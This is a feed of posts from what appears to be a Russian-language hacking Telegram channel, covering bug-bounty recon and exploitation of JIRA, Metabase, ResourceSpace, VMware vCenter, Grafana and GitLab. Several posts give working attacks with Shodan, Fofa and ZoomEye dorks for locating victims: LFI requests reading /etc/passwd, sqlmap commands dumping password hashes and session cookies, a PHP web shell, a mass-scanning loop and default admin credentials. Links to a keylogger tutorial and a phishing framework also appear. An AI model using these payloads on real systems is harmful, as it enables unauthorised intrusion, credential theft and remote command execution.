SHADOW:Group
11.5K subscribers
107 photos
47 videos
19 files
823 links
Чат: @shadow_chat_tg

Рекламу не размещаю.

Админ - @shdwpwn
Download Telegram
​​​​🔦 Быстрый и настраиваемый сканер уязвимостей для JIRA

JIRA - это коммерческая система отслеживания проблем, разработанная Atlassian, которая позволяет отслеживать ошибки и гибко управлять проектами. На днях на гитхабе появился новый сканер уязвимостей написанный на Python для JIRA, под названием Jira-Lens.

Этот инструмент выполняет более 25 проверок, включая CVE и угрозы раскрытия информации в предоставленном экземпляре JIRA.

Чтобы немного автоматизировать, можно с помощью Nuclei определить какие хосты относятся к JIRA и просканировать их все:

cat alive.domains | nuclei -c 50 -silent -t ~/nuclei-templates/exposed-panels/jira-detect.yaml | awk '{print $6}' | anew jira.domains && python3 Jira-Lens.py -f jira.domains

#web #jira #tools

Ссылка на GitHub
​​ Сбор поддоменов с помощью перестановок и комбинаций

Чтобы найти еще больше поддоменов для атаки, мы можем сгенеририровать комбинации или перестановки уже известных нам поддоменов.

В этом методе нам также нужен небольшой список слов, который содержал бы такие распространенные слова, как mail, internal, dev, demo, accounts, ftp, admin (похоже на брутфорс поддоменов, но требуется меньше слов). Список таких слов можно найти например здесь.

Например, давайте рассмотрим поддомен dev.example.com. Мы можем сгенерировать различные вариации перестановок этого поддомена (смотри скрин ниже) с помощью инструмента gotator:

gotator -sub domains.txt -perm permutations_list.txt -depth 3 -numbers 10 | uniq > permutations.txt

Теперь, когда мы составили огромный список всех возможных поддоменов, пришло время зарезолвить их и узнать, существуют ли они на самом деле. Для этого мы будем использовать puredns:

puredns resolve permutations.txt -r resolvers.txt

Где взять актуальный список резолверов я расказывал вот тут.

#web #recon
👍2
​​📖 Произвольное чтение файлов в Metabase (CVE-2021-41277)

Metabase - это платформа для анализа данных с открытым исходным кодом. В уязвимых версиях была обнаружена проблема безопасности с настраиваемой картой GeoJSON приводящая к LFI. Более подробно тут.

PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1

Шаблон для Nuclei есть по ссылке. Уязвимые хосты можно поискать тут:

Дорк для Shodan
Дорк для Fofa

#web #cve
​​🏮 0day LPE в установщике Windows

Работает для всех версий установщика Windows, включая Windows 11 и Server 2022 с ноябрьским патчем.

Уязвимость была обнаружена при анализе патча для CVE-2021-41379. Мелкомягкие не смогли корректно исправить уязвимость, что в итоге привело к появлению обхода их патча.

Ссылка на эксплоит

#redteam #windows #lpe
​​🖇 Сканирование уязвимостей в Nmap с помощью NSE скриптов

Скрипты NSE Nmap позволяют не только выполнять задачи сканирования портов, но и обнаруживать CVE за считанные секунды.

Три наиболее популярных скрипта для обнаружения уязвимостей/CVE, найденных в Nmap NSE - это nmap-vulners, vulscan и vuln, которые позволят вам обнаруживать соответствующую информацию CVE на удаленных или локальных хостах.

Установка vulscan

git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan


Запуск vulscan

nmap -sV --script=vulscan/vulscan.nse www.example.com

Установка nmap-vulners

cd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git

Запуск nmap-vulners

nmap --script nmap-vulners/ -sV 11.22.33.44

Запуск Vuln:

nmap -Pn --script vuln 192.168.1.105

Аналогичным образом используются и другие скрипты. Про все доступные в Nmap скрипты, а также про их удобный поиск я уже рассказывал ранее.

#redteam #recon #cve
👍1
​​💉 Множественные уязвимости в ResourceSpace (CVE-2021-41765)

Уязвимость в ResourceSpace <=9.5 позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольные SQL-команды, что может приводить к другим уязвимостям.

Это позволяет злоумышленникам раскрыть полное содержимое базы данных, включая файлы cookie сеанса пользователей и выполнять произвольные команды на сервере.

SQLi

sqlmap --cookie 'upload_share_active=1' -u "http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysql

От SQLi до прав админа

Дампим имена, хэши паролей и куки, для получения административного доступа:

sqlmap --cookie 'upload_share_active=1' -u "http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysql --dump -D resourcespace -T user -C username,password,session

RCE

В приложении есть функция загрузки плагинов, поэтому можно загрузить плагин, содержащий веб-оболочку:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>%

Упакуйте в .tar.gz, затем переименуйте в .rsp

Для получения более подробной информации смотрите тут.

#web #sqli #rce
🔥1
​​🕸 Веб-службы на нестандартных портах

Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.

Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:

httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result

#web #recon
💻 Управляем своим VPS через Telegram

Увидел на GitHub небольшой python скрипт, который позволяет выполнять команды на вашем сервере и получать выходные данные непосредственно в Telegram.

Это также может быть очень полезно при выполнении рекона или при выполнении длительных команд, которые требуют взаимодействия с пользователем.

Ссылка на GitHub

#bash #python #tools
​​🕵️‍♂️ Отслеживание новых целей для атаки

Каждое сканирование, которое вы выполняете с помощью amass, автоматически сохраняется на компьютере, на котором вы его запустили. Затем, если вы снова запустите ту же проверку, amass будет отслеживать любые изменения, произошедшие с момента вашего последнего сканирования.

Наиболее очевидный способ использовать эту функцию-определить, какие поддомены появились с момента вашего последнего сканирования. Например, вы выполняли ранее сканирование:

amass enum -d vimeo.com

Сейчас прошло несколько месяцев и если снова выполнить это сканирование, а затем прописать

amass track -d vimeo.com

то мы сможем увидеть все, что изменилось за эти месяцы. Это позволяет нам сосредоточить внимание на свежих целях, которые с большей вероятностью будут уязвимы.

#web #tools #recon
💉 Взлом административной панели IBM и получение на ней SQLi

Несколько советов и хитростей по разведке в Shodan, проверка уязвимостей Broken Access Control, SQL инъекция в приложении на основе Java, а также о важности повышения воздействия от найденных уязвимостей.

#web #recon #bac #sqli

Читать статью
​​🗳 LFI, SSRF и XSS в VMware vCenter

В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.

Для поиска уязвимых хостов можно использовать однострочник:

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Дорк, который можно использовать для поиска в Shodan:

http.title:"ID_VC_Welcome"

Для поиска в Zoomeye:

app:"VMware vCenter"

#web #lfi #ssrf #xss
Forwarded from Social Engineering
📚 Пентест и Хакинг: подборка лучших бесплатных курсов на YouTube.

🖖🏻 Приветствую тебя user_name.

• Это вторая подборка бесплатных курсов. Первая опубликована в нашем канале и находится по этой ссылке. Ну а сегодня будет продолжение. Небольшая подборка бесплатных курсов на любой вкус. Подробное описание можно найти под названием каждого курса, перейдя по ссылке.

Курсы по программированию на python. Этичный хакинг. — тут 123 урока. Думаю название говорит само за себя.
https://youtu.be/nCmTEeb2RTc

@codeby_sec предоставляет своим читателям,зрителям и подписчикам учебные материалы по этичному хакингу и тестированию на проникновение с Kali Linux, Windows и других операционных систем. На ютуб канале собраны отличные курсы на русском языке: https://www.youtube.com/channel/UCDiXbVs0_aUD8uKblEzEUkw/playlists
Курс #Metasploit - программа для пентеста в дистрибутиве Kali Linux.
Полный курс по этичному взлому, от начального до продвинутого уровня.
Внедрение SQL кода.
GSM хакинг.

Следующие курсы: SQL инъекции, Kali для начинающих и курс по тестированию на проникновение.
https://www.youtube.com/channel/UCQd9gYcVvNudGI8O4Lqu-dg/playlists

Full Ethical Hacking Course - Network Penetration Testing for Beginners (2019) — курс будет полезным для начинающих пентестеров. Ранее его стримили на твиче, а сейчас он собран в одном видео на ютубе. Также, у автора есть репозиторий: https://github.com/hmaverickadams/Beginner-Network-Pentesting
Ссылка на курс: https://youtu.be/3Kq1MIfTWCE

Linux for Ethical Hackers (Kali Linux Tutorial) — Изучаем основы #Kali #Linux: установка, командная строка, #bash, инструменты и т.д.
https://youtu.be/lZAoFs75_cs

Create a Keylogger with Python - Tutorial — Руководство по созданию кейлоггера на языке Python.
https://youtu.be/TbMKwl11itQ

Linux Essentials for Ethical Hackers — 4х часовой курс. Все что нужно знать про Linux для пентеста и этичного хакерства.
https://youtu.be/1hvVcEhcbLM

Improve Cybersecurity Skills with CTFs — Для тех, кто любит #CTF.
https://youtu.be/uIkxsBgkpj8

Penetration Testing: Gophish Tutorial (Phishing Framework)GoPhish — инструмент для фишинга с открытым исходным кодом, предназначенный для тестирования на проникновение. Обладает быстрой и легкой настройкой и обеспечивает легкое управление фишинговыми операциями. Курс как раз об этом инструменте. Рекомендую к просмотру и изучению.
https://youtu.be/S6S5JF6Gou0

‼️ Дополнительную информацию ты можешь найти по хештегам #Курс и #Книга. Твой S.E.
​​📃 Списки слов для различных версий распространенных веб-приложений

Репозиторий, содержащий списки слов для различных версий распространенных веб-приложений и систем управления контентом (CMS).

Может быть полезно при фаззинге.

Ссылка на GitHub

#web #wordlist #recon
​​🔑 Учётные данные по умолчанию в GitLab

Если вы нашли экземпляр GitLab, попробуйте войти в систему как root или admin с этими учетными:

Имя пользователя: root
Пароль: 5iveL!Fe

Имя пользователя: admin
Пароль: 5iveL!Fe

Ссылка на доку находится здесь.

Поискать экземпляры GitLab можно с помощью Shodan:

http.title:"GitLab"

#web #
​​🖇 Команды для доступа к страницам с кодом ответа 403

Коллекция списков слов, команд FFUF и шаблонов Nuclei для обхода страниц с кодом ответа 403 (доступ запрещён)

#web #fuzz

Ссылка на GitHub
​​📄 Несанкционированное чтение файлов в Grafana (0day)

Похоже, что новый 0day LFI в Grafana существует благодаря плагину grafana-clock-panel. Достаточно отправить GET запрос вида:

GET /public/plugins/grafana-clock-panel/../../../../../../../etc/passwd

Тем временем, найти Grafana можно с помощью дорка для ZoomEye:

app:"Grafana"

Или в Shodan:

Grafana

—————————

UPD:

Работает и через другие плагины в /public/plugins/*

#web #lfi #0day
​​🇪🇺 Списки слов для фаззинга сайтов на разных языках

При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:

▫️ Infosec Wordlists
▫️ Dirbuster Spanish
▫️ Bip Spanish
▫️ Türkçe Wordlist
▫️ krypt0n wordlists
▫️ Combined-Wordlists
▫️ Common Web Managers Fuzz Wordlists
▫️ Cracking French passwords

#web #fuzz #wordlist
Forwarded from Social Engineering
🔎 OSINT. Поиск геолокации нашей цели.

🖖🏻 Приветствую тебя user_name.

• Многие популярные социальные сети, мессенджеры, сервисы, заботятся о том, что бы при загрузке любых файлов, из них удалялись метаданные. И когда ты планируешь скачать фотографию или видео того или иного человека \ объекта, то ты можешь не обнаружить там никакой полезной информации.

• Сегодня я поделюсь с тобой подборкой статей, с помощью которых ты научишься определять геолокацию цели, будь то человек или другой объект. Это очень полезный материал для специалистов в области #OSINT и Социальных Инженеров:

Определение местоположения по фотографии.
Определение местоположения по фотографии. Обратный поиск изображений.
Используем тень для определения местоположения военной базы США.
Извлечь, исследовать, проверить.
Как природа может раскрывать секреты геолокации.
GeoTips: советы по поиску геолокации в странах мира.

Перевод статей от @cybred:
Определяем дату сделанного снимка.
Как определить геолокацию фотографии по отражению в стекле.
Как определить местоположение по фотографиям, сделанным на природе.
Используем Солнце и тени для определения геолокации по фотографии.

Инструменты:
Набор погодных карт.
Поиск информации о погоде в разное время по городу, почтовому индексу или коду аэропорта.
Спутниковые снимки, аэрофотоснимки, снимки с беспилотников и многое другое.
Необычный сервис для поиска кратчайшего маршрута от точки А до точки Б.
Карта для отслеживания самолетов в реальном времени.
Онлайн транспортир.

Полное руководство по OSINT с использованием Maltego.
Что такое Maltego и зачем оно вообще нужно;
Интерфейс и базовое устройство;
Maltego и OSINT в Facebook;
Maltego и OSINT в ВК, Instagram, LinkedIN и других соцсетях;
Применение системы распознавания лиц для OSINT в Maltego;
Поиск информации с применением геолокации.

‼️
Дополнительную информацию ты можешь найти по хештегам #OSINT и #СИ. Твой S.E.